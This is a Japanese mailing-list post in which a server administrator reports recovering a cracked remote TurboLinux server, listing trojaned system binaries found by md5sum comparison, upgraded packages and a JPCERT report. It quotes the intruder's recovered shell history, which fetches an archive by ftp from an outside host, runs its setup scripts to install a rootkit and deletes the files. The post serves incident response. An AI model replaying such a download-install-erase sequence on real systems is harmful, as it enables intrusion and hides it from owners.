[fol] クラッキング

[くまきら〜＠電脳組<aki _at_ xxxxxxxxxxxxxxx>]

くまがいです。

> まず、問題のマシンをネットワークから遮断します。次に、新しいディスクを
> 用意して、新規にシステムを再構築しましょう。クラックされたものは、その
> ままいじらずに証拠保全した方が良いでしょう。

通常は、直ぐにシャットダウンし、ネットワークから切り離すべきだと思います。
そして、再インストールするのが他のサーバーにご迷惑をかけないはずです。
おしゃることは正しいのですが、サーバーが私のところから実に600kmも
離れたところにあり、手におえないんですよ。
仕方が無いので、オリジナルのTurboLinuxをインストールしたマシーンを
用意して、md5sumで問題サーバーとの比較チェックしました。
チェックしたのは、ディレクトリのタイムスタンプが変更されている
ディレクトリのファイルを対象に行いました。
セキュリティ対策も行い、refused connectonしていることを確認しました。

それから、ハッキングとかきましたが、システムをいじられているので
クラッキングが正しいです。

そして、証拠保全は行いませんでしたが、作業内容を記録しているので
JPCERTに報告する予定です。
クラックされたことはすでにJPCERTに報告しています。

> Linux Rootkitというのをインストールされているかも知れません。こんな内
> 容です。
> This packages includes the following:

これは大変助かります、ありがとうございます。
こんなツール群があったなんてイヤですね(^^;
あとで再チェックしてみますが、私のところで検出できた
トロイの木馬と追加された変なポートは次のとおりです。
チェックはmd5sumでオリジナルと比較しました。

---追加変更されたファイル---
/etc/rc.sysinitでin.inetdを起動するように変更
/bin/loginを変更
/bin/lsを変更
/bin/netstatを変更
/bin/psを変更
/usr/sbin/dbmmanage*を変更
/usr/sbin/imapd*を変更
/usr/sbin/in.fingerd*を変更
/usr/sbin/in.ftpd*を変更
/usr/sbin/in.rshd*を変更
/usr/sbin/ipop2d*を変更
/usr/sbin/logcheck*を変更
/usr/sbin/logtail*を変更
/usr/sbin/named*を変更
/usr/sbin/gencustomlistを追加?(インストールした覚えが無い)
/usr/sbin/genhdlistを追加?(インストールした覚えが無い)
/usr/sbin/in.inetdを追加
/???/turbopkg???を追加(ファイル名忘れた)
/usr/src/Linux2.0.36???/以下のファイルを変更
---追加変更したファイル(ここまで)---
これらのファイルはオリジナルで上書きしました。

その後に、念の為にアップグレードしたファイルは次のとおりです。
Appach1.3.9 (apache-1.3.9-2.i386.rpm)
kernel 2.2.12(kernel-2.2.12-8.i386.rpm)
kernel 2.2.12(kernel-headers-2.2.12-8.i386.rpm)
kernel 2.2.12(kernel-ibcs-2.2.12-8.i386.rpm)
kernel 2.2.12(kernel-pcmcia-cs-2.2.12.3.0.14-8.i386.rpm)
kernel 2.2.12(kernel-source-2.2.12-8.i386.rpm)
fsck類(e2fsprogs-1.14-4.i386.rpm)
gnu file utilitys 4.0(fileutils-4.0-2.i386.rpm)
wu-ftpd-2.6.0(以前に自分がコンパイルしたやつをインストール)

私のところに残っているログで、浸入に使われたユーザーの
シェルヒストリーが残っていました。
こんな感じです。
この中のsvet*.tar.gzというアーカイブのセット内容が
かなり気になります。


--- user xxxxxで実行したコマンド ---
uname -a
ftp linux.tai.com.pl
gzip -d svet*
tar -xvf svet*
cd svet
./setup h1b4r1
./kaka
./b2
telnet localhost
ls
cd ..
rm -rf svet*
rm -rf rc
ls
w
uname -a
telnet irc.seed.net.tw 6666
nick macert
telnet irc.stealth.net 6667
telnet irc.webbernet.net 6667
ls
cat /etc/hosts
host -l kira.to
ls
w
exit
pico
chmod +x rc
./rc
--- user xxxxxで実行したコマンド(ここまで) ---


> こんなものをインストールされたら再構築するしか無いでしょう。

再インストールが一番楽なのですが、遠くにサーバーが設置されており、
サービスを停止できないんですよ。
凄く困ったのですが、結局は地道にファイルをチェックしています。

ところで、問題のlogin実行ファイルはdebugfsで消しました。
このコマンドに気がつくのに凄く時間がかかりました。
unixでは、たまに消えないファイルが出来るようなので
偶然消せなかったのかもしれません。

最後に、なぜクラッキングを受けたかを知ったきっかけは、
ハッカーのマヌケな行為で発見しました。
それは、私のサーバーのrootからハッカー宛てにシステムの内容を
返すメールを送ったようなのですが、unknown userで戻ってきたのです。
しかも、ハッカーがcronで実行したコマンドも失敗しています。
こういうレベルのハッカーなので、そんなに悪さしていないことを
願っています。

みなさんのご協力で不正アクセスされたサーバーも健全に
なりそうです。

なにか追加情報ありましたら、よろしくお願いします。

p.s.
システムを破壊するクラッキングはもう流行じゃないのでしょうかねぇ？
他のサーバーをクラックするための踏み台としてのクラックが流行り
なのかなぁ。
それから、不正アクセスは毎回違うアドレスから行われるのは
当然として、驚くことに.nec.co.jpからも不正アクセスと思われる
アクセスがあった点です。
いまだにアタックは続いています。
refused connectonなのに諦めが悪いみたいです。

---------
Akira Kumagai
aki _at_ kira.to
http://www.kira.to